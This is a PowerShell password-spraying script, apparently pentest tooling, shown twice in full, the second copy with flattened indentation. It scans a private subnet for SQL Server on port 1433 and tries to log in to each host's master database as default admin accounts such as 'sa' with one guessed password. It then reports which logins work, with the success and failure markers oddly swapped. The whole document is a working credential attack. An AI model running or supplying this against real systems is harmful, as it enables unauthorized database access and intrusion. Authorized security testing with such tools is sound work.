cutaway/basic_sql_auth_spray.ps1

## basic_sql_auth_spray.ps1
###########################
# References:
# https://pen-testing.sans.org/blog/2017/03/08/pen-test-poster-white-board-powershell-built-in-port-scanner/
# https://mcpmag.com/articles/2018/12/10/test-sql-connection-with-powershell.aspx
# https://support.solarwinds.com/SuccessCenter/s/article/Use-PowerShell-to-test-that-a-port-is-open-on-a-server
###########################

function Test-SqlConnection {
    #param(
        #[Parameter(Mandatory)]
        #[string]$ServerName,

        #[Parameter(Mandatory)]
        #[string]$DatabaseName,

        #[Parameter(Mandatory)]
        #[pscredential]$Credential
    #)

    $DefaultUsers = 'sa','sysadmin','dbo','SystemAdmin','dbmanager'
    $DatabaseName = 'master'
    $DefaultPassword = 'Fall2019!'
    $ErrorActionPreference = 'Stop'

    $subNet = "10.111.222"
    $subStart = 0
    $subStop = 255
    foreach ($HostOctet in $subStart..$subStop){
        $ServerName = "$subNet.$HostOctet"
        if (Test-NetConnection -InformationLevel Quiet -Port 1433 $ServerName){
            Write-Output "[*] Testing Connection to $ServerName."
            foreach ($user in $DefaultUsers){
                try {
                    #$userName = $Credential.UserName
                    $userName = $user
                    #$password = $Credential.GetNetworkCredential().Password
                    $password = $DefaultPassword
                    $connectionString = 'Data Source={0};database={1};User ID={2};Password={3}' -f $ServerName,$DatabaseName,$userName,$password
                    $sqlConnection = New-Object System.Data.SqlClient.SqlConnection $ConnectionString
                    $sqlConnection.Open()
                    ## This will run if the Open() method does not throw an exception
                    Write-Output "    [-] Connection to $ServerName with $user successful."
                } catch {
                    Write-Output "    [+] Connection to $ServerName with $user not successful."
                } finally {
                    ## Close the connection when we're done
                    $sqlConnection.Close()
                }
            }
        }
    }
}
	###########################
	# References:
	# https://pen-testing.sans.org/blog/2017/03/08/pen-test-poster-white-board-powershell-built-in-port-scanner/
	# https://mcpmag.com/articles/2018/12/10/test-sql-connection-with-powershell.aspx
	# https://support.solarwinds.com/SuccessCenter/s/article/Use-PowerShell-to-test-that-a-port-is-open-on-a-server
	###########################

	function Test-SqlConnection {
	#param(
	#[Parameter(Mandatory)]
	#[string]$ServerName,

	#[Parameter(Mandatory)]
	#[string]$DatabaseName,

	#[Parameter(Mandatory)]
	#[pscredential]$Credential
	#)

	$DefaultUsers = 'sa','sysadmin','dbo','SystemAdmin','dbmanager'
	$DatabaseName = 'master'
	$DefaultPassword = 'Fall2019!'
	$ErrorActionPreference = 'Stop'

	$subNet = "10.111.222"
	$subStart = 0
	$subStop = 255
	foreach ($HostOctet in $subStart..$subStop){
	$ServerName = "$subNet.$HostOctet"
	if (Test-NetConnection -InformationLevel Quiet -Port 1433 $ServerName){
	Write-Output "[*] Testing Connection to $ServerName."
	foreach ($user in $DefaultUsers){
	try {
	#$userName = $Credential.UserName
	$userName = $user
	#$password = $Credential.GetNetworkCredential().Password
	$password = $DefaultPassword
	$connectionString = 'Data Source={0};database={1};User ID={2};Password={3}' -f $ServerName,$DatabaseName,$userName,$password
	$sqlConnection = New-Object System.Data.SqlClient.SqlConnection $ConnectionString
	$sqlConnection.Open()
	## This will run if the Open() method does not throw an exception
	Write-Output " [-] Connection to $ServerName with $user successful."
	} catch {
	Write-Output " [+] Connection to $ServerName with $user not successful."
	} finally {
	## Close the connection when we're done
	$sqlConnection.Close()
	}
	}
	}
	}
	}